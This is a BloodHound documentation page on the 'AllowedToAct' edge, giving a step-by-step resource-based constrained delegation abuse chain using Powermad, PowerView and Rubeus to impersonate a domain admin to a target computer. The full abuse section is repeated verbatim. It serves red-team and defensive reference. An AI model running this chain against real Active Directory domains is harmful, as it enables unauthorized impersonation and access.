> ## Documentation Index
> Fetch the complete documentation index at: https://bloodhound.specterops.io/llms.txt
> Use this file to discover all available pages before exploring further.
# AllowedToAct
> This edge allows an attacker to abuse resource-based constrained delegation to compromise the target. This property is a binary DACL that controls what security principals can pretend to be any domain user to the particular computer object.
An attacker can execute a modified S4U2self/S4U2proxy abuse chain to impersonate any domain user to the target computer system and receive a valid service ticket “as” this user.
One caveat is that impersonated users can not be in the “Protected Users” security group or otherwise have delegation privileges revoked. Another caveat is that the principal added to the msDS-AllowedToActOnBehalfOfOtherIdentity DACL *must* have a service principal name (SPN) set in order to successfully abuse the S4U2self/S4U2proxy process. If an attacker does not currently control an account with a SPN set, an attacker can abuse the default domain MachineAccountQuota settings to add a computer account that the attacker controls via the Powermad project.
**Abuse Info**
Abusing this primitive is currently possible through the Rubeus project.
First, if an attacker does not control an account with an SPN set, Kevin Robertson’s Powermad project can be used to add a new attacker-controlled computer account:
```bash theme={null}
New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
```
PowerView can be used to then retrieve the security identifier (SID) of the newly created computer account:
```bash theme={null}
$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
```
We now need to build a generic ACE with the attacker-added computer SID as the principal, and get the binary bytes for the new DACL/ACE:
```bash theme={null}
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
```
Next, we need to set this newly created security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer account we’re taking over, again using PowerView in this case:
```bash theme={null}
Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
```
We can then use Rubeus to hash the plaintext password into its RC4\_HMAC form:
```bash theme={null}
Rubeus.exe hash /password:Summer2018!
```
And finally we can use Rubeus’ *s4u* module to get a service ticket for the service name (sname) we want to “pretend” to be “admin” for. This ticket is injected (thanks to /ptt), and in this case grants us access to the file system of the TARGETCOMPUTER:
```bash theme={null}
Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:admin /msdsspn:cifs/TARGETCOMPUTER.testlab.local /ptt
```
See a video walk through of how to execute this attack here:
## Opsec Considerations
To execute this attack, the Rubeus C# assembly needs to be executed on some system with the ability to send/receive traffic in the domain.
## Edge Schema
Source: [User](/resources/nodes/user), [Group](/resources/nodes/group), [Computer](/resources/nodes/computer)\
Destination: [Computer](/resources/nodes/computer)\
Traversable: **Yes**
## References
* [https://eladshamir.com/2019/01/28/Wagging-the-Dog.html](https://eladshamir.com/2019/01/28/Wagging-the-Dog.html)
* [https://github.com/GhostPack/Rubeus#s4u](https://github.com/GhostPack/Rubeus#s4u)
* [https://gist.github.com/HarmJ0y/224dbfef83febdaf885a8451e40d52ff](https://gist.github.com/HarmJ0y/224dbfef83febdaf885a8451e40d52ff)
* [https://blog.harmj0y.net/redteaming/another-word-on-delegation/](https://blog.harmj0y.net/redteaming/another-word-on-delegation/)
* [https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)
* [https://github.com/Kevin-Robertson/Powermad#new-machineaccount](https://github.com/Kevin-Robertson/Powermad#new-machineaccount)
* [https://specterops.io/blog/2019/03/12/bloodhound-2-1-the-fix-broken-stuff-update/](https://specterops.io/blog/2019/03/12/bloodhound-2-1-the-fix-broken-stuff-update/)
An attacker can execute a modified S4U2self/S4U2proxy abuse chain to impersonate any domain user to the target computer system and receive a valid service ticket “as” this user.
One caveat is that impersonated users can not be in the “Protected Users” security group or otherwise have delegation privileges revoked. Another caveat is that the principal added to the msDS-AllowedToActOnBehalfOfOtherIdentity DACL *must* have a service principal name (SPN) set in order to successfully abuse the S4U2self/S4U2proxy process. If an attacker does not currently control an account with a SPN set, an attacker can abuse the default domain MachineAccountQuota settings to add a computer account that the attacker controls via the Powermad project.
**Abuse Info**
Abusing this primitive is currently possible through the Rubeus project.
First, if an attacker does not control an account with an SPN set, Kevin Robertson’s Powermad project can be used to add a new attacker-controlled computer account:
```bash theme={null}
New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
```
PowerView can be used to then retrieve the security identifier (SID) of the newly created computer account:
```bash theme={null}
$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
```
We now need to build a generic ACE with the attacker-added computer SID as the principal, and get the binary bytes for the new DACL/ACE:
```bash theme={null}
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
```
Next, we need to set this newly created security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer account we’re taking over, again using PowerView in this case:
```bash theme={null}
Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
```
We can then use Rubeus to hash the plaintext password into its RC4\_HMAC form:
```bash theme={null}
Rubeus.exe hash /password:Summer2018!
```
And finally we can use Rubeus’ *s4u* module to get a service ticket for the service name (sname) we want to “pretend” to be “admin” for. This ticket is injected (thanks to /ptt), and in this case grants us access to the file system of the TARGETCOMPUTER:
```bash theme={null}
Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:admin /msdsspn:cifs/TARGETCOMPUTER.testlab.local /ptt
```
See a video walk through of how to execute this attack here:
## Opsec Considerations
To execute this attack, the Rubeus C# assembly needs to be executed on some system with the ability to send/receive traffic in the domain.
## Edge Schema
Source: [User](/resources/nodes/user), [Group](/resources/nodes/group), [Computer](/resources/nodes/computer)\
Destination: [Computer](/resources/nodes/computer)\
Traversable: **Yes**
## References
* [https://eladshamir.com/2019/01/28/Wagging-the-Dog.html](https://eladshamir.com/2019/01/28/Wagging-the-Dog.html)
* [https://github.com/GhostPack/Rubeus#s4u](https://github.com/GhostPack/Rubeus#s4u)
* [https://gist.github.com/HarmJ0y/224dbfef83febdaf885a8451e40d52ff](https://gist.github.com/HarmJ0y/224dbfef83febdaf885a8451e40d52ff)
* [https://blog.harmj0y.net/redteaming/another-word-on-delegation/](https://blog.harmj0y.net/redteaming/another-word-on-delegation/)
* [https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)
* [https://github.com/Kevin-Robertson/Powermad#new-machineaccount](https://github.com/Kevin-Robertson/Powermad#new-machineaccount)
* [https://specterops.io/blog/2019/03/12/bloodhound-2-1-the-fix-broken-stuff-update/](https://specterops.io/blog/2019/03/12/bloodhound-2-1-the-fix-broken-stuff-update/)